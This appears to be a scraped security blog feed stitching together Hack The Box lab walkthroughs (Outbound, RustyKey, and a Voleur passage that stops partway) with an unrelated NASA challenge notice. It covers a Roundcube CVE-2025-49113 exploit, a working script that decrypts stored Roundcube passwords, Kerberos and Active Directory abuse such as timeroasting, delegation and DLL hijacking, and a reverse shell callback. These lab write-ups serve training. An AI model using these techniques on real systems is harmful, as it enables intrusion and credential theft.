After accessing the email portal, the inbox appears to be empty.
After logging in, the first step is to check the Roundcube version. In this case, it is running version 1.6.10.
Another way to verify the version is by checking the information embedded in the pageβs source code.
After doing some research, I discovered that this version is affected by a known vulnerability, identified as CVE-2025-49113.
CVEβ2025β49113 is a serious vulnerability in Roundcube Webmail versions up to 1.5.9 and 1.6.10. It occurs in the upload.php feature, where certain input parameters are not properly validated. An attacker with valid user credentials can exploit this flaw to execute arbitrary code on the server by sending a specially crafted payload. This can allow the attacker to run commands, install backdoors, or take further control of the system. The vulnerability is particularly dangerous because it requires minimal technical effort once credentials are obtained, and proof-of-concept exploits are publicly available. Applying the patched versions 1.5.10 or 1.6.11 and above is necessary to secure the system.
The script begins by checking whether the Roundcube instance is running a vulnerable version. If it is, it continues with the login process. Once authenticated, it uploads a normal-looking PNG file to the server. During this upload, the exploit carries out two key injections: one targeting the PHP session via the _from parameter in the URL, and another that slips a malicious object into the filename field of the _file parameter. When combined, these injections trigger code execution on the server, allowing the attacker to execute commands remotely.
You can download the Python script from the following repository: https://github.com/00xCanelo/CVE-2025-49113.
This command runs the exploit script and requires four arguments: the target Roundcube URL, a valid username, the corresponding password, and the system command you want the server to execute.
The upload went through successfully.
Unfortunately, it didnβt produce any outcome.
I changed the payload to use a base64βencoded command.
The attempt failed once more.
I replaced the script with the PHP version from https://github.com/hakaioffsec/CVE-2025-49113-exploit. Unexpectedly, the script hung, and thatβs a positive indication.
Finally, it worked successfully.
So, letβs proceed using Tylerβs credentials.
Improve the shell to a full interactive one.
I couldnβt locate any files related to the configuration.
Since the application uses Roundcube, letβs check for the configuration file at /var/www/html/roundcube/config/config.inc.php.
This configuration file defines the essential settings for the Roundcube Webmail installation. It specifies the MySQL database connection using the credentials roundcube:RCDBPass2025 on the local database server, which Roundcube relies on to store its data. The file also sets the IMAP and SMTP servers to localhost on ports 143 and 587, meaning both incoming and outgoing mail services run locally, and Roundcube uses the userβs own login credentials for SMTP authentication. The product name is set to Roundcube Webmail, and the configuration includes a 24βcharacter DES key used for encrypting IMAP passwords in session data. Additionally, the installation enables the archive and zipdownload plugins and uses the elastic skin for its interface. Overall, this file contains the key operational and securityβsensitive parameters needed for Roundcube to function.
The commands show a successful login to the MariaDB database using the roundcube user account with the password RCDBPass2025. After entering the password, access to the MariaDB monitor is granted, allowing the user to execute SQL commands. The prompt confirms that the server is running MariaDB version 10.11.13 on Ubuntu 24.04, and provides standard information about the database environment, including copyright details and basic usage instructions. This access enables management of the Roundcube database, including querying, updating, or modifying stored data.
The commands demonstrate exploring the MariaDB instance after logging in as the roundcube user. First, show databases; lists all databases on the server, revealing the default information_schema and the roundcube database, which stores the webmail applicationβs data. Next, use roundcube; switches the context to the Roundcube database, allowing operations within it. Running show tables; displays all the tables in the database, totaling 17, which include tables for caching (cache, cache_index, cache_messages, etc.), email contacts (contacts, contactgroups, contactgroupmembers), user identities (identities, users), and other operational data (session, system, filestore, responses, searches). These tables collectively manage Roundcubeβs functionality, storing user accounts, session data, cached messages, and other configuration or runtime information necessary for the webmail system.
This snippet appears to be a serialized Roundcube session or user configuration for the account jacob. It stores settings such as the user ID, username, encrypted password, IMAP server details (localhost:143), mailbox information (e.g., INBOX with 2 unseen messages), session tokens, authentication secret, timezone (Europe/London), UI preferences like skin and layout, and other session-related flags. Essentially, it contains all the data Roundcube needs to manage the userβs session, mailbox view, and preferences while interacting with the webmail interface.
#!/usr/bin/env python3
import base64
from Crypto.Cipher import DES3
from Crypto.Util.Padding import unpad
DES_KEY = 'rcmail-!24ByteDESkey*Str' # Roundcube 3DES key (24 bytes)
def extract_iv_and_data(b64_string):
"""Decode base64 and split into IV + encrypted data."""
raw = base64.b64decode(b64_string)
return raw[:8], raw[8:]
def create_cipher(des_key, iv):
"""Return a 3DES CBC cipher instance."""
key = des_key.encode('utf-8')[:24]
return DES3.new(key, DES3.MODE_CBC, iv)
def decrypt_value(b64_string, des_key):
"""Decrypt a Roundcube-encrypted base64 string."""
try:
iv, encrypted = extract_iv_and_data(b64_string)
cipher = create_cipher(des_key, iv)
decrypted_padded = cipher.decrypt(encrypted)
# Remove padding safely
try:
decrypted = unpad(decrypted_padded, DES3.block_size)
except:
decrypted = decrypted_padded.rstrip(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08')
return decrypted.decode('utf-8', errors='ignore').strip(), iv, encrypted
except Exception as e:
return f"Decryption failed: {str(e)}", None, None
def print_decryption(label, data, des_key):
"""Helper to decrypt and print results in structured form."""
plaintext, iv, encrypted = decrypt_value(data, des_key)
print(f"[{label}]")
print(f" Base64: {data}")
print(f" Plaintext: {plaintext}")
if iv is not None:
print(f" IV: {iv.hex()}")
print(f" Encrypted(hex): {encrypted.hex()}")
print()
def main():
# Extracted values
username = "jacob"
password_b64 = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
auth_secret_b64 = "DpYqv6maI9HxDL5GhcCd8JaQQW"
request_token_b64 = "TIsOaABA1zHSXZOBpH6up5XFyayNRHaw"
print("\n=== Roundcube Password / Token Decryptor ===\n")
print(f"Using DES Key: {DES_KEY}\n")
print(f"User: {username}\n")
print_decryption("Password", password_b64, DES_KEY)
print_decryption("Auth Secret", auth_secret_b64, DES_KEY)
print_decryption("Request Token", request_token_b64, DES_KEY)
print("Decryption Method: 3DES CBC (IV extracted from base64)")
if __name__ == "__main__":
main()
This Python script is designed to decrypt Roundcube webmail passwords (and similar session tokens) that are stored in 3DES-encrypted form. Key points:
des_key) and an 8-byte IV extracted from the start of the base64-encoded data.unpad; if that fails, it manually strips extra bytes.jacobβs password (L7Rv00A8TuwJAr67kITxxcSgnIk25Am/) along with the auth_secret and request_token.
The decrypted Roundcube credentials reveal the username jacob with the plaintext password 595mO8DmwGeD. These credentials can now be tested for SSH authentication to determine whether the same password is reused across services. Since password reuse is common in misconfigured environments, attempting SSH login with these details may provide direct shell access to the target system.
The email content from Jacobβs mailbox shows two messages. The first, from Tyler, notifies Jacob of a recent password change and provides a temporary password gY4Wr3a1evp4, advising Jacob to update it upon next login. The second email, from Mel, informs Jacob about unexpected high resource consumption on the main server. Mel mentions that resource monitoring has been enabled and that Jacob has been granted privileges to inspect the logs, with a request to report any irregularities immediately. Together, these emails reveal sensitive information including temporary credentials and access responsibilities for server monitoring.
Weβre now able to access and read the user flag.
Privilege Escalation:
Consistent with the earlier hint, sudo -l reveals sudo access to /usr/bin/below.
After investigating below, we found its GitHub project. In the Security section, the advisory GHSA-9mc5-7qhg-fp3w is listed.
This advisory describes an Incorrect Permission Assignment for a Critical Resource affecting version 0.9.0. Inspecting the /var/log/below directory, we see that its permissions are set to 0777, meaning it is world-writable. This confirms the advisoryβs impact, as anyone can create or modify files in this directory.
Further research shows that this vulnerability is tracked as CVEβ2025β27591, and a PoC is publicly available.
Upload the Python script to the compromised host.
Using the exploit from the following source: BridgerAldersonβs CVEβ2025β27591 PoC on GitHub.
We can read the root flag simply by running cat root.txt.
The post Hack The Box: Outbound Machine Walkthrough β Easy Difficulity appeared first on Threatninja.net.
NASAβs Technology Transfer Office invites entrepreneurs, innovators, and creative thinkers to apply NASAβs patented technologies to practical applications. Participants will select an existing NASA patent and develop a business or product concept that will be evaluated based on value proposition, business model viability, development feasibility, and quality of presentation. Entries should clearly demonstrate creativity, feasibility, and a compelling rationale for how the concept could create real-world impact.
Award: $13,000 in total prizes
Open Date: October 6, 2025
Close Date: December 15, 2025
For more information, visit: https://nasapatentremixchallenge.org/
In this writeup, we will explore the βRustyKeyβ machine from Hack The Box, categorized as an Hard difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βRustyKeyβ machine from Hack The Box by achieving the following objectives:
User Flag:
Authenticated to the domain as bb.morgan (password P@ssw0rd123) after exploiting Kerberos flows and time sync. You obtained a Kerberos TGT (bb.morgan.ccache), exported it via KRB5CCNAME, and used evilβwinrm to open an interactive shell on dc.rustykey.htb.
Root Flag:
Escalation to SYSTEM was achieved by abusing machine and delegation privileges. Using the ITβCOMPUTER3$ machine account you modified AD protections and reset ee.reedβs password, then performed S4U2Self/S4U2Proxy to impersonate backupadmin and saved backupadmin.ccache. With that ticket, you used Impacket to upload and run a service payload and spawned a SYSTEM shell.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV 10.10.11.75 -oA initialNmap Output:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-29 13:48:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrappedAnalysis:
rustykey.htb0. Useful for ticket-based authentication attacks such as AS-REP roasting or Kerberoasting.
Before starting, we need to specify the correct Kerberos realm by creating a krb5.conf file in /etc/krb5.conf and adding the following content above
The scans show an Active Directory host (dc.rustykey.htb) with SMB and LDAP/kerberos services; SMB on 10.10.11.75 negotiated x64, signing required, and SMBv1 disabled, while an SMB auth attempt for rr.parker returned STATUS_NOT_SUPPORTED β indicating the server rejected the authentication method the client used rather than definitively proving the password is wrong. The LDAP attempt shows KDC_ERR_WRONG_REALM for rustykey.htb\rr.parker, meaning the Kerberos realm in use didnβt match the domain. Likely causes include incorrect credentials, an auth-method mismatch (NTLM vs Kerberos or wrong NTLM dialect), enforced SMB signing, wrong/unspecified Kerberos realm, account restrictions (disabled/locked/password change required), or tool/quoting issues from special characters. Triage by retrying with a domain-qualified username (RUSTYKEY\rr.parker or rr.parker@RUSTYKEY), testing with alternate SMB clients (crackmapexec, smbclient, Impacket), forcing NTLM if needed, validating Kerberos realm and obtaining a TGT, performing LDAP or rpc enumeration to confirm account status, and escaping or simplifying the password to rule out encoding problems.
This time, the error returned is KRB_AP_ERR_SKEW, indicating a time synchronization issue between the client and the server.
Using nxc with Kerberos authentication (-k) and domain rustykey.htb, the SMB service on dc.rustykey.htb was successfully accessed with the credentials rr.parker:8#t5HE8L!W3A. The enumeration revealed an x64 domain controller with SMB signing enabled and SMBv1 disabled. The command listed 11 local users, including Administrator, Guest, krbtgt, rr.parker, mm.turner, bb.morgan, gg.anderson, dd.ali, ee.reed, nn.marcos, and backupadmin, along with their last password set dates and account descriptions. This confirms that rr.parkerβs credentials are valid and have sufficient access to query user accounts over SMB. The successful Kerberos-based login also verifies proper realm configuration and time synchronization, allowing secure enumeration of domain users.
Using Kerberos authentication (-k) with the domain rustykey.htb, LDAP enumeration on dc.rustykey.htb successfully authenticated as rr.parker:8#t5HE8L!W3A. The scan enumerated 11 domain users, showing usernames, last password set dates, and account descriptions. Accounts include Administrator, Guest, krbtgt, rr.parker, mm.turner, bb.morgan, gg.anderson, dd.ali, ee.reed, nn.marcos, and backupadmin. This confirms rr.parkerβs credentials are valid and have permission to query domain user information over LDAP. The domain controller responded correctly to Kerberos authentication, indicating proper realm configuration and time synchronization.
Impacket successfully requested a TGT from DC 10.10.11.75 for rustykey.htb/rr.parker and saved the Kerberos ticket to rr.parker.ccache.
Set the Kerberos credential cache by exporting KRB5CCNAME=rr.parker.ccache so Kerberos-aware tools use the saved TGT for authentication.
This directs commands like klist, curl βnegotiate, and Impacket utilities to the specified ccache.
The DNS timeout indicates that the BloodHound collector couldnβt resolve SRV records or reach the domain controllerβs DNS. This often happens due to incorrect DNS settings on your Parrot OS machine, firewall restrictions, or reliance on SRV lookups instead of a direct DC IP.
Synchronizing the clock with ntpdate -s 10.10.11.75 resolved the issue. Kerberos authentication requires the client and domain controller clocks to be closely aligned, and a time drift triggers KRB_AP_ERR_SKEW errors. After syncing, the Kerberos TGT became valid, allowing BloodHound to authenticate and enumerate the domain successfully. You can verify the ticket with klist and rerun BloodHound using -k or your ccache. For a persistent solution, consider running a time service like chrony or ntpd, or continue using ntpdate during the engagement.
ITβCOMPUTER3$ added itself to the HelpDesk group.
Execute timeroast.py.
Because the machine requires Kerberos authentication, enumeration attempts return no results. In addition to AS-REP roasting and Kerberoasting, a new technique called timeroast has recently emerged.
The screenshot above shows the hash as clean.
Hashcat was unable to crack the hash.
The main() function sets up and runs the script: it creates an argument parser with two positional inputs (the timeroast hashes file and a password dictionary opened with latin-1 encoding), parses those arguments, then calls try_crack to iterate through dictionary candidates and compare them to the parsed hashes. For each match it prints a β[+] Cracked RID β¦β line and increments a counter, and when finished it prints a summary of how many passwords were recovered. The if __name__ == '__main__' guard ensures main() runs only when the script is executed directly.
Running python3 timecrack.py timeroast.txt rockyou.txt recovered one credential: RID 1125 β password Rusty88!. Total passwords recovered: 1.
Impacket requested a TGT for the machine account IT-COMPUTER3$ on rustykey.htb and saved the Kerberos ticket to IT-COMPUTER3$.ccache. The Kerberos credential cache was set to IT-COMPUTER3$.ccache by exporting KRB5CCNAME=IT-COMPUTER3\$.ccache, directing Kerberos-aware tools to use this saved TGT for authentication.
Using BloodHound with Kerberos against dc.rustykey.htb (domain rustykey.htb), authenticated as the machine account IT-COMPUTER3$, and ran add groupMember HELPDESK IT-COMPUTER3$ β the account IT-COMPUTER3$ was successfully added to the HELPDESK group.
Using BloodyAD with Kerberos against dc.rustykey.htb (domain rustykey.htb), authenticated as the machine account IT-COMPUTER3$, ran set password for bb.morgan to P@ssw0rd123, and the password was changed successfully.
Impacket attempted to request a TGT for bb.morgan@rustykey.htb, but the KDC rejected it with KDC_ERR_ETYPE_NOSUPP, meaning the Key Distribution Centre does not support the encryption type used.
If you need that permission, remove the protection first β bb.morgan.
Ran BloodyAD with Kerberos against dc.rustykey.htb as IT-COMPUTER3$ to remove the account IT from the PROTECTED OBJECTS group, and the tool reported that IT was removed. Using BloodyAD with Kerberos against dc.rustykey.htb as IT-COMPUTER3$ I changed bb.morganβs password to P@ssw0rd123. I then requested a TGT for bb.morgan with impacket-getTGT and saved the ticket to bb.morgan.ccache
Set KRB5CCNAME to bb.morgan.ccache so Kerberos-aware tools use that credential cache.
If evil-winrm failed, common causes are WinRM not reachable, wrong auth method, or account restrictions. First check connectivity and service: nc -vz 10.10.11.75 5985 (and 5986). Test the WinRM endpoint with curl to see auth behavior:curl --negotiate -u 'bb.morgan:P@ssw0rd123' http://10.10.11.75:5985/wsman
If youβre using Kerberos, ensure KRB5CCNAME points to the bb.morgan ccache and run evil-winrm with Kerberos (use the toolβs Kerberos flag). If password auth, try: evil-winrm -i 10.10.11.75 -u bb.morgan -p 'P@ssw0rd123'. If that still fails, try an alternate Impacket client (wmiexec.py, psexec.py) to rule out evil-winrm-specific issues. Also verify the account isnβt restricted (must-change-password, disabled, or requires smartcard) and that SMB/WinRM signing/policy isnβt blocking the session. Tell me the exact error if you want targeted troubleshooting.
After synchronising the system clock with rdate, evil-winrm successfully established a session to dc.rustykey.htb using the bb.morgan account in the rustykey.htb domain.
To view the user flag, run type user.txt at the command prompt.
Privilege Escalation:
One PDF file stood out and drew my attention.
Download the PDF to our machine.
The message appears to be from bb.morgan to support-team@rustykey.htb, stating the support team will receive elevated registry permissions and temporary elevated rights.
Reviewing BloodHound shows ee.reed is a member of the support-team@rustykey.htb group.
Using the ITβCOMPUTER3$ machine account you removed SUPPORT from the Protected Objects container and reset ee.reedβs password to P@ssword123 β actions that demonstrate domainβlevel privilege to alter AD protections and control user accounts. With ee.reedβs credentials you can obtain a TGT, export a ccache, and authenticate to domain services (SMB/WinRM/LDAP) to escalate access and pivot further.
This indicates that the SUPPORT group has modify permissions on the registry and can interact with compression and decompression functions.
Requested a TGT for ee.reed@rustykey.htb from DC 10.10.11.75 and saved the Kerberos ticket to ee.reed.ccache.
Evilβwinrm failed to establish a session using ee.reedβs access.
Letβs start the listener.
Upload runascs.exe
Attempt to execute the payload.
Access obtained as ee.reed.
Oddly, the victim machine has 7βZip installed.
Itβs 7βZip version 24.08.
The command reg query "HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers" queries the Windows Registry to list all entries under the ContextMenuHandlers key for all file types (*) in the HKEY_LOCAL_MACHINE\Software\Classes hive.
Query the registry key HKEY_LOCAL_MACHINE\Software\Classes\*\ShellEx\ContextMenuHandlers\7-Zip.
Display the registry key HKLM\SOFTWARE\Classes\CLSID{23170F69-40C1-278A-1000-000100020000}.
Query the registry key HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32.
This PowerShell command retrieves and displays the detailed access permissions (ACL) for the 7-Zip COM object CLSID registry key (HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}), showing which users or groups can read, modify, or take ownership of the key in a clear, list format.
Download the DLL file onto the target machine.
Add or update the default value of HKLM\Software\Classes\CLSID{23170F69-40C1-278A-1000-000100020000}\InprocServer32 to C:\tmp\dark.dll using reg add with the force flag.
Executing rundll32.exe dark.dll, dllmain produces no visible effect.
Obtained a shell as the user mm.turner.
It shows that the SUPPORT group has registry modify permissions and can access compression and decompression functionalities.
Initially, this PowerShell command failed to configure the DC computer account to allow delegation to the IT-COMPUTER3$ account by setting the PrincipalsAllowedToDelegateToAccount property.
This PowerShell command configures the DC computer account to allow delegation to the IT-COMPUTER3$ account by setting the PrincipalsAllowedToDelegateToAccount property, effectively granting that machine account the ability to act on behalf of other accounts for specific services.
Ran Impacket getST for SPN cifs/DC.rustykey.htb while impersonating backupadmin (DC 10.10.11.75) using rustykey.htb/IT-COMPUTER3$:Rusty88!. No existing ccache was found so a TGT was requested, the tool performed S4U2Self and S4U2Proxy flows to impersonate backupadmin, and saved the resulting ticket as backupadmin.ccache. Deprecation warnings about UTC handling were also printed.
Export the Kerberos ticket to a ccache file, then use Impacketβs secretdump to extract the account hashes.
Using the backupadmin Kerberos ticket (no password), Impacket connected to dc.rustykey.htb, discovered a writable ADMIN$ share, uploaded rFPLWAqZ.exe, created and started a service named BqCY, and spawned a shell β whoami returned NT AUTHORITY\SYSTEM.
To view the root flag, run type root.txt at the command prompt.
The post Hack The Box: RustyKey Machine Walkthrough β Hard Difficulity appeared first on Threatninja.net.
In this write-up, we will explore the βVoleurβ machine from Hack The Box, categorised as a medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the βVoleurβ machine from Hack The Box by achieving the following objectives:
User Flag:
I found a password-protected Excel file on an SMB share, cracked it to recover service-account credentials, used those credentials to obtain Kerberos access and log into the victim account, and then opened the userβs Desktop to read user.txt.
Root Flag:
I used recovered service privileges to restore a deleted administrator account, extracted that userβs encrypted credential material, decrypted it to obtain higher-privilege credentials, and used those credentials to access the domain controller and read root.txt.
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oA initial -Pn 10.10.11.76Nmap Output:
ββ[dark@parrot]β[~/Documents/htb/voleur]
ββββΌ $nmap -sC -sV -oA initial -Pn 10.10.11.76
# Nmap 7.94SVN scan initiated Thu Oct 30 09:26:48 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.76
Nmap scan report for 10.10.11.76
Host is up (0.048s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-30 20:59:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-10-30T20:59:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h32m19s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 30 09:27:43 2025 -- 1 IP address (1 host up) scanned in 55.54 secondsAnalysis:
impacket-getTGT voleur.htb/ryan.naylor:HollowOct31Nyt (Impacket v0.12.0) β TGT saved to ryan.naylor.ccache; note: significant clock skew with the DC may disrupt Kerberos operations.
impacket-getTGT used ryan.naylorβs credentials to request a Kerberos TGT from the domain KDC and saved it to ryan.naylor.ccache; that ticket lets anyone request service tickets and access AD services (SMB, LDAP, HTTP) as ryan.naylor until it expires or is revoked, so inspect it with KRB5CCNAME=./ryan.naylor.ccache && klist and, if the request was unauthorized, reset the account password and check KDC logs for suspicious AS-REQs.
Setting KRB5CCNAME=ryan.naylor.ccache tells the Kerberos libraries to use that credential cache file for authentication so Kerberos-aware tools (klist, smbclient -k, ldapsearch -Y GSSAPI, Impacket tools with -k) will present the saved TGT; after exporting, run klist to view the ticket timestamps and then use the desired Kerberos-capable client (or unset the variable when done).
nxc ldap connected to the domain controllerβs LDAP (DC.voleur.htb:389) using Kerberos (-k), discovered AD info (x64 DC, domain voleur.htb, signing enabled, SMBv1 disabled) and successfully authenticated as voleur.htb\ryan.naylor with the supplied credentials, confirming those credentials are valid for LDAP access.
nxc smb connected to the domain controller on TCP 445 using Kerberos (-k), enumerated the host as dc.voleur.htb (x64) with SMB signing enabled and SMBv1 disabled, and successfully authenticated as voleur.htb\ryan.naylor with the supplied credentials, confirming SMB access to the DC which can be used to list or mount shares, upload/download files, or perform further AD discovery while the accountβs privileges allow.
Runs bloodhound-python to authenticate to the voleur.htb domain as ryan.naylor (using the provided password and Kerberos via -k), query the specified DNS server (10.10.11.76) and collect all AD data (-c All) across the domain (-d voleur.htb), then package the resulting JSON data into a zip file (βzip) ready for import into BloodHound for graph-based AD attack path analysis; this gathers users, groups, computers, sessions, ACLs, trusts, and other relationships that are sensitive β only run with authorization.
ryan.naylor is a member of Domain Users and First-line Technicians β Domain Users is the default domain account group with standard user privileges, while First-line Technicians is a delegated helpdesk/tech group that typically has elevated rights like resetting passwords, unlocking accounts, and limited workstation or AD object management; combined, these memberships let the account perform routine IT tasks and makes it a useful foothold for lateral movement or privilege escalation if abused, so treat it as sensitive and monitor or restrict as needed.
Connected to dc.voleur.htb over SMB using Kerberos authentication; authenticated as voleur.htb\ryan.naylor and enumerated shares: ADMIN$, C$, Finance, HR, IPC$ (READ), IT (READ), NETLOGON (READ), and SYSVOL (READ), with SMB signing enabled and NTLM disabled.
If impacket-smbclient -k dc.voleur.htb failed, target a specific share and provide credentials or use your Kerberos cache. For example, connect with Kerberos and no password to a known share: impacket-smbclient -k -no-pass //dc.voleur.htb/Finance after exporting KRB5CCNAME=./ryan.naylor.ccache, or authenticate directly with username and password: impacket-smbclient //dc.voleur.htb/Finance -u ryan.naylor -p HollowOct31Nyt; specifying the share usually succeeds when the root endpoint refuses connections.
Shares need to be selected from the enumerated list before accessing them.
The SMB session showed available shares (including hidden admin shares ADMIN$ and C$, domain shares NETLOGON and SYSVOL, and user shares like Finance, HR, IT); the command use IT switched into the IT share and ls will list that shareβs files and directories β output depends on ryan.naylorβs permissions and may be empty or restricted if the account lacks write/list rights.
Directory listing shows a folder named First-Line Support β change into it with cd First-Line Support and run ls to view its contents.
Inside the First-Line Support folder, there is a single file named Access_Review.xlsx with a size of 16,896 bytes, along with the standard . and .. directories.
Retrieve or save the Access_Review.xlsx file from the share to the local system.
Saved the file locally on your machine.
The file Access_Review.xlsx is encrypted using CDFv2.
The file is password-protected and cannot be opened without the correct password.
Extracted the password hash from Access_Review.xlsx using office2john and saved it to a file named hash.
The output is the extracted Office 2013 password hash from Access_Review.xlsx in hashcat/John format, showing encryption type, iteration count, salt, and encrypted data, which can be used for offline password cracking attempts.
Hashcat could not identify any supported hash mode that matches the format of the provided hash.
CrackStation failed to find a viable cracking path.
After researching the hash, itβs confirmed as Office 2013 / CDFv2 (PBKDF2βHMACβSHA1 with 100,000 iterations) and maps to hashcat mode 9600; use hashcat -m 9600 with targeted wordlists, masks, or rules (GPU recommended) but expect slow hashing due to the high iteration count β if hashcat rejects the format, update to the latest hashcat build or try Johnβs office2john/output path; only attempt cracking with proper authorization.
I found this guide on Medium that explains how to extract and crack the Office 2013 hash we retrieved
After performing a password enumeration, the credential football1 was identified, potentially belonging to the svc account. It is noteworthy that the Todd user had been deleted, yet its password remnants were still recoverable.
The Access_Review.xlsx file contained plaintext credentials for two service accounts: svc_ldap β M1XyC9pW7qT5Vn and svc_iis β N5pXyV1WqM7CZ8. These appear to be service-account passwords that could grant LDAP and IIS access; treat them as sensitive, rotate/reset the accounts immediately, and audit where and how the credentials were stored and used.
svc_ldap has GenericWrite over the Lacey user objects and WriteSPN on svc_winrm; next step is to request a service ticket for svc_winrm.
impacket-getTGT used svc_ldapβs credentials to perform a Kerberos AS-REQ to the domain KDC, received a valid TGT, and saved it to svc_ldap.ccache; that TGT can be used to request service tickets (TGS) and access domain services as svc_ldap until it expires or is revoked, so treat the ccache as a live credential and rotate/reset the account or investigate KDC logs if the activity is unauthorized.
Set the Kerberos credential cache to svc_ldap.ccache so that Kerberos-aware tools will use svc_ldapβs TGT for authentication.
Attempt to bypass the disabled account failed: no krbtgt entries were found, indicating an issue with the LDAP account used.
Run bloodyAD against voleur.htb as svc_ldap (Kerberos) targeting dc.voleur.htb to set the svc_winrm objectβs servicePrincipalName to HTTP/fake.voleur.htb.
The hashes were successfully retrieved as shown previously.
Cracking failed when hashcat hit a segmentation fault.
Using John the Ripper, the Office hash was cracked and the password AFireInsidedeOzarctica980219afi was recovered β treat it as a live credential and use it only with authorization (e.g., to open the file or authenticate as the associated account).
Authenticate with kinit using the cracked password, then run evil-winrm to access the target.
To retrieve the user flag, run type user.txt in the compromised session.
Request a TGS for the svc_winrm service principal.
Use evil-winrm the same way as before to connect and proceed.
Alternatively, display the user flag with type C:\Users\<username>\Desktop\user.txt.
Privilege Escalation:
Enumerated C:\ and found an IT folder that warrants closer inspection.
The IT folder contains three directories β each checked next for sensitive files.
No relevant files or artifacts discovered so far.
The directories cannot be opened with the current permissions.
Runs bloodyAD against dc.voleur.htb as svc_ldap (authenticating with the given password and Kerberos) to enumerate all Active Directory objects that svc_ldap can write to; the get writable command lists objects with writable ACLs (e.g., GenericWrite, WriteSPN) and βinclude-del also returns deleted-object entries, revealing targets you can modify or abuse for privilege escalation (resetting attributes, writing SPNs, planting creds, etc.).
From the list of writable AD objects, locate the object corresponding to Todd Wolfe.
Located the object; proceed to restore it by assigning sAMAccountName todd.wolfe.
Runs bloodyAD against dc.voleur.htb as svc_ldap (Kerberos) to restore the deleted AD object todd.wolfe on the domain β this attempts to undelete the tombstoned account and reinstate its sAMAccountName; success depends on svc_ldap having sufficient rights and the object still being restorable.
The restoration was successful, so the next step is to verify whether the original password still works.
After evaluating options, launch runascs.exe to move forward with the attack path.
Execute RunasCS.exe to run powershell as svc_ldap using password M1XyC9pW7qT5Vn and connect back to 10.10.14.189:9007.
Established a reverse shell session from the callback.
Successfully escalated to and accessed the system as todd.wolfe.
Ultimately, all previously restricted directories are now visible.
You navigated into the IT share (Second-Line Support β Archived Users β todd.wolfe) and downloaded two DPAPI-related artefacts: the Protect blob at AppData\Roaming\Microsoft\Protect<SID>\08949382-134f-4c63-b93c-ce52efc0aa88 and the credential file at AppData\Roaming\Microsoft\Credentials\772275FAD58525253490A9B0039791D3; these are DPAPI master-key/credential blobs that can be used to recover saved secrets for todd.wolfe, when combined with the appropriate user or system keys, should be them as highly sensitive.
Using impacket-dpapi with todd.wolfeβs masterkey file and password (NightT1meP1dg3on14), the DPAPI master key was successfully decrypted; the output shows the master key GUID, lengths, and flags, with the decrypted key displayed in hex, which can now be used to unlock the userβs protected credentials and recover saved secrets from Windows.
The credential blob was decrypted successfully: itβs an enterprise-persisted domain password entry last written on 2025-01-29 12:55:19 for target Jezzas_Account with username jeremy.combs and password qT3V9pLXyN7W4m; the flags indicate it requires confirmation and supports wildcard matching. This is a live domain credential that can be used to authenticate to AD services or for lateral movement, so handle it as sensitive and test access only with authorization.
impacket-getTGT used jeremy.combsβs credentials to request a Kerberos TGT from the domain KDC and saved it to jeremy.combs.ccache; that TGT can be used to request service tickets (TGS) and authenticate to AD services (SMB, LDAP, WinRM, etc.) as jeremy.combs until it expires or is revoked, so inspect it with KRB5CCNAME=./jeremy.combs.ccache && klist and treat the cache as a live credential β rotate/reset the account or review KDC logs if the activity is unauthorized.
Set the Kerberos credential cache to jeremy.combs.ccache so Kerberos-aware tools will use jeremy.combsβs TGT for authentication.
Run bloodhound-python as jeremy.combs (password qT3V9pLXyN7W4m) using Kerberos and DNS server 10.10.11.76 to collect all AD data for voleur.htb and save the output as a zip for BloodHound import.
Account jeremy.combs is in the Third-Line Technicians group.
Connected to dc.voleur.htb with impacket-smbclient (Kerberos), switched into the IT share and listed contents β the directory Third-Line Support is present.
